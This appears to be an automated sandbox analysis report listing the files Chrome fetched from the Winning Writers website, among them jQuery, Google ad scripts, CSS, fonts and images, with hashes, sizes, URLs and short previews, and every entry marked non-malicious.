                                                                                                                                                                                            MD5:E42228BF86554E2FA08C4712F97F7E34
                                                                                                                                                                                            SHA1:6CFEE8F581C086D53C9B40FE651324AE8DEC88D4
                                                                                                                                                                                            SHA-256:8468FD27249AE1FE5F63AE32EBB17810F0502BFAC5C0090208EF0650BF8FC696
                                                                                                                                                                                            SHA-512:642B6DCEDE23DA64A4B3072864CDBC54421ADC97976FDA643439D3CED5CB39334325E94653B787965C1DBE703CEFAF68531D28140831ACB070ADB609C8C74F6A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/hoverintent.js
                                                                                                                                                                                            Preview:(function($){../* hoverIntent by Brian Cherne */..$.fn.hoverIntent = function(f,g) {...// default configuration options...var cfg = {....sensitivity: 7,....interval: 100,....timeout: 0...};...// override configuration options with user supplied object...cfg = $.extend(cfg, g ? { over: f, out: g } : f );....// instantiate variables...// cX, cY = current X and Y position of mouse, updated by mousemove event...// pX, pY = previous X and Y position of mouse, set by mouseover and polling interval...var cX, cY, pX, pY;....// A private function for getting mouse position...var track = function(ev) {....cX = ev.pageX;....cY = ev.pageY;...};....// A private function for comparing current and previous mouse position...var compare = function(ev,ob) {....ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);....// compare mouse positions to see if they've crossed the threshold....if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivity ) {.....$(ob).unbind("mousemove",track);.....// set hoverInten
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                                            Entropy (8bit):2.9881439641616536
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                            MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                            SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                            SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                            SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32072)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):93100
                                                                                                                                                                                            Entropy (8bit):5.300526104474089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:q4mCgi8DyCuXXFiJ+L0kJQsJVPEKLQRZdC/RlfDknv+p0WzH/IoSZ7qABZnu0sFv:qGsKXlI2p0WPSbDrstfam
                                                                                                                                                                                            MD5:E0E0559014B222245DEB26B6AE8BD940
                                                                                                                                                                                            SHA1:E2F3603E23711F6446F278A411D905623D65201E
                                                                                                                                                                                            SHA-256:89A15E9C40BC6B14809F236EE8CD3ED1EA42393C1F6CA55C7855CD779B3F922E
                                                                                                                                                                                            SHA-512:60740DA8F871B8263675DB2421B0E565FC18E95C772F7C3D5916F224263CD71A6A2E6ACCEAB2F6F8BA1C0607951F0198F525D87D0589FA57045B1D5F292DACF0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js
                                                                                                                                                                                            Preview:/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q)
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4941
                                                                                                                                                                                            Entropy (8bit):5.8097619573840324
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU2eJZetU75T:1DY0h8Rx47OIqWbZbeJZe+T
                                                                                                                                                                                            MD5:A625A91E27A61B35C3CFCAC719B9A03E
                                                                                                                                                                                            SHA1:3739EE630AB053E1517DC3E128136D2AB1B22E04
                                                                                                                                                                                            SHA-256:0267A6802A7FC75FFF398EB4CDB895913E314DE3D17FD62B26ECA5CCE612343C
                                                                                                                                                                                            SHA-512:503343B9CD72442D99ECBA0CBDFB07B6C0732ABE27AEF4C5946709167455247E5834138945A2FA319CDFC7E0ED05C5183610D1A985CED15C9AB1ADF217641C60
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 50 x 28, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1596
                                                                                                                                                                                            Entropy (8bit):6.935275342468915
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:N1htZdWwylZ82lYSqMHiWeA45VwtT3ohyJ3VDteAfGCwaUcezMCLKJhxg:zqinNuiWe7+JJ3fem8JbLK9g
                                                                                                                                                                                            MD5:17010EABC38256152257B0A0193502E0
                                                                                                                                                                                            SHA1:0DDDD539EABE638F992C571F0E3CC272675EAEBA
                                                                                                                                                                                            SHA-256:BF1DE56AC494972F4C85D02EC14D1081C255795D34191D83747A9D23AD5D30B9
                                                                                                                                                                                            SHA-512:630B3165D8862C3A0ACECEF817229741F3B30794156A470502ED11B6131A15E67270CA1D037E311D66BD4E0322D8EBB026CEA46581F5C9EC3D8EBF6F7D991E48
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...2...........{.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="xmp.did:E934D970319111E39611DEC0FE3DCF01" xmpMM:InstanceID="xmp.iid:E934D96F319111E39611DEC0FE3DCF01" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6B3F16C624206811822AF15E66BD7D4D" stRef:documentID="uuid:C508247BAB39DE11919BBBE5BE681828"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):108674
                                                                                                                                                                                            Entropy (8bit):7.940125201033711
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:oURqI7lbMi4wRXwr3ECK6XR/mKuYeZXkftHNaUBl/iYXaG6Kacr7UMkDH7PND16G:TlbfRoR/beN8RRL/XLLrYMi7p1FhVYq
                                                                                                                                                                                            MD5:DA9E01F84170A1163A9281DEFAF33CD8
                                                                                                                                                                                            SHA1:45F9F970161E2749BC73F2C0CEFDFDB30A18B2EF
                                                                                                                                                                                            SHA-256:6506FA24A9DD9C402E7BAB720BC5365B08E5266BA6728F170BFC6BB0DEC5DBF3
                                                                                                                                                                                            SHA-512:E1C48148AE3667620A4D965003DEE2E23B05DC3AB4903C30A659DF748E833B885B6CEDBF383D8D7A20C9E02FF42FD8714A85A48B331D5CDEA10EEB23E4C2C71A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:25F6B956F20211EE8331DF4817DBDCA3" xmpMM:InstanceID="xmp.iid:25F6B955F20211EE8331DF4817DBDCA3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1336bb3b-69de-4e14-985c-139969cdce8e" stRef:documentID="adobe:docid:photoshop:424138f0-d66f-4446-8326-16ba962b178c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:troff or preprocessor input, ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                            Entropy (8bit):4.825494821842331
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:UYcAUJGPcjjfKnmjjf0a3NDbVwABjfr9FbQCKzZWHaP/ryTxNbITI2Tk:0kPzAbVwAPFbQVZ4anuTxNbI7Tk
                                                                                                                                                                                            MD5:7C78A514137ED7EAC4F8D5667E9CE061
                                                                                                                                                                                            SHA1:398F02EB5CC47691195B33F3736652BA903AAFB6
                                                                                                                                                                                            SHA-256:28EAF5B413C03F371058DA480FFAF2D8F29FF503BB1BFB5A0B561CC26E94B42C
                                                                                                                                                                                            SHA-512:8DAD7C0016E534A52A2C10DE71F37EF03462F1890C5ADE8EC3AA7FAA25626269011F632B2EA4ECBA6A8471609340B1D886ED25A152EF2C9260D25EC764F0A094
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/css/responsive-nav-styles.css
                                                                                                                                                                                            Preview:/*! responsive-nav.js 1.0.23 by @viljamis */...nav-collapse ul {. margin: 0;. padding: 0;. width: 100%;. display: block;. list-style: none;.}...nav-collapse li {. width: 100%;. display: block;.}...js .nav-collapse {. clip: rect(0 0 0 0);. max-height: 0;. position: absolute;. display: block;. overflow: hidden;. zoom: 1;.}...nav-collapse.opened {. max-height: 9999px;.}...nav-toggle {. -webkit-tap-highlight-color: rgba(0,0,0,0);. -webkit-touch-callout: none;. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. -o-user-select: none;. user-select: none;.}../* @media screen and (min-width: 40em) { */.@media screen and (min-width: 781px) { /* for desktop - matches large media query */. .js .nav-collapse {. position: relative;. }. .js .nav-collapse.closed {. max-height: none;. }. .nav-toggle {. display: none;. }.}.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 175 x 262, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):45587
                                                                                                                                                                                            Entropy (8bit):7.977356923988581
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:xjHklElUybngAEcjKTDXoG9t1wyUI8aLzvUeABB4sIiVGxeZRqri2dPVrU3G08JY:xjHgElBbgqsxjwyUTaLzv21VgeZRT6VQ
                                                                                                                                                                                            MD5:5AAC33B64B61DB404DC4C352B2FC35A4
                                                                                                                                                                                            SHA1:26D7847C1F38AF21AB5E71B440500B82C29AA8F1
                                                                                                                                                                                            SHA-256:0C116691E73C53871DE8BE89E7BD10501D6F145ACCDCB3D15A5BA0F5C8D234DC
                                                                                                                                                                                            SHA-512:95CC7C8DFAB1712970C4E5696B19CF30F89D02DAB6AF875BDC98D431ADF43BFC8917718F10901CCC739E91DE5031D75AAFCE674F4834535E3D5B7BA09CB4F802
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/lion-mobile.png
                                                                                                                                                                                            Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...piTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:0780117407206811808398A4089E17D8" xmpMM:DocumentID="xmp.did:AFB868D2320411E39611DEC0FE3DCF01" xmpMM:InstanceID="xmp.iid:B8ACDC7E31C411E39611DEC0FE3DCF01" xmp:CreatorTool="Adobe Photoshop Elements 10.0 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0980117407206811808398A4089E17D8" stRef:documentID="xmp.did:0780117407206811808398A4089E17D8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..D....9IDATx....NU...y.2WR2&c.Dx..gJQd..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960038420&cv=11&fst=1731960038420&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1080, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):153001
                                                                                                                                                                                            Entropy (8bit):7.925073842268102
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:dT39GA0wi1MfZrbZ563od44rMC4k2HQtBlXstuGpVS40w0QJdjA:vd0wiIr/6UL4QL9stT5VJS
                                                                                                                                                                                            MD5:289DC53D13DB4A109300633213A48771
                                                                                                                                                                                            SHA1:B39E2E1CF3C76BABA74B448AB6F44C9AB283F683
                                                                                                                                                                                            SHA-256:4DE5D89CF342AAB97FEE60EA271127660AEFFAF025DF16778138C46E000A168D
                                                                                                                                                                                            SHA-512:D6A91227E73452D01108558C26EBCD4BEF9F9606847497BDCBAD9E02E972E83C8319F96F9D91FBA3C9B00F83781E847A429F91DCB1B1D20F393F707784835A7F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://scontent-ord5-1.cdninstagram.com/v/t51.2885-15/467112998_3886836521643779_8605725034765016710_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=18de74&_nc_ohc=_cdycnS1RYQQ7kNvgEJjUe2&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYDPIeUcR1p4zvzbgpOdfbp9YsIY1oSApIPk7ope3-S9-Q&oe=674157AC
                                                                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(.Uo/.l"...C.d..,..>.=.4.KV.6.TVO.$....4....O...]...........Hw/.O...j+'..].................A.?...S.h.....}..kQY?.._......%?..It/..i......G..p.S...Z......B.......).4..K...cO.......=.;...g...VO.$....4....O...]...........!.=..?.....%..1....J....._......%?.i...............A.?...S.h....B.......).4{Hw.e>..5..........O.8...\.EX.N...N.Z(....Q@..Q@..Q@..Q@..Q@..Q@..Q@
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.819840763531224
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUke5NawytU7H:1DY0h8Rx47OIqWbZJe5NawyK
                                                                                                                                                                                            MD5:0A79B7A3E958047754291EC267A05DB4
                                                                                                                                                                                            SHA1:69A7DC14E45B6F93E164405D64D3B11DAD553F31
                                                                                                                                                                                            SHA-256:A3BD2D0761E7B7C04B4B60F795B4AB323E994C1511877E20A2BA471F19237C04
                                                                                                                                                                                            SHA-512:35F7C2FBC3865BAA07FEB6FBF5B7E3E7B33D881EE7DBF3FCB1AE0BB8523DF8CF453ACDE5B0C9BAB99E2EB8D55CE139AB94E18F4E362ECAF80EBFA00BAB1C73E0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960022416&cv=11&fst=1731960022416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960078431&cv=11&fst=1731960078431&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):22246
                                                                                                                                                                                            Entropy (8bit):5.250077569430435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:3ynTfQQqY42j8kjn28QhqY42+ZFAEqY4CUHqY4fZ2/CdB:U1TMrEO7S
                                                                                                                                                                                            MD5:6BB87EF0167CDFF041E1CE6C03A0C2F1
                                                                                                                                                                                            SHA1:D17B8BBB1B9C9ACCE00D3CA26851454CE4F3FB61
                                                                                                                                                                                            SHA-256:614DA757C32E134B91C696204FB9526ACB812E27E8D42FFD9A48CCBA03EF3CB0
                                                                                                                                                                                            SHA-512:D08CC7B9E5F7940A0D46139618D179DD3DD029391913BAC4704B1A96471C81C48446604A299CD2E8D0C4BF8DAFDEE0205C586311B4A761BA9AAAE35C9FB3AA2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:"https://fonts.googleapis.com/css2?family=Lora:ital,wght@0,400;0,700;1,400;1,700&family=Raleway:wght@400;700&display=swap"
                                                                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLPtLp_A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LJftLp_A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* math */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LXftLp_A.woff2) format('woff2');. unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9,
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 1774 x 1578, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):32572
                                                                                                                                                                                            Entropy (8bit):6.886545089263578
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:vxZ2t+/9BK7J3V6oueOMKBHcmNVIhp1El:Wt+lsgo0MKXNbl
                                                                                                                                                                                            MD5:84952888BB237E40F8FCB290247323B7
                                                                                                                                                                                            SHA1:02D57D975EED8A05823096F22FA0040519937D41
                                                                                                                                                                                            SHA-256:390B5EF685FCABA863E4C2411F492E4B0E771AA07A6B72D3A66565DB793EB1A0
                                                                                                                                                                                            SHA-512:920DAE183C4BF73B0A7B4264CEA25811C21C2C6114C59F7280F880F82C3D4B9AB8DDAC4093B5E95665039EB3F5F3C6E00168185615404A55FE8402FEC0643CE6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
